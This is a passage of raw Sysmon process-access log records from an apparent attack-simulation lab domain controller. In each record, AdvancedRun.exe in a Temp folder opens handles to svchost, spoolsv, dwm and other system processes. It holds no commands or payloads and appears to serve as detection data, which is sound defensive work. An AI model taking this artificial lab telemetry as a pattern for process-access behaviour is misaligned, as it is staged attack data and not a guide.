ocal\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079724Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.823{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.821{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004079721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004079720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004079719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004079718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004079717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE
10341000x80000000000000004079716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1
10341000x80000000000000004079715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
